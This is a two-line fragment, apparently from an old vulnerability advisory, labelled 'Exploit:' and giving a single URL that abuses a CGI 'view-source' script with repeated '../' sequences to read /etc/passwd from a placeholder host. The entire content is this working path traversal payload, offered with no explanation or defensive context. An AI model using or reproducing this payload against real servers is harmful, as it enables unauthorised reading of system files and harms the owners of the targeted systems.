Exploit:

'http://www.host.com/cgi-bin/view-source?../../../../../../../etc/passwd'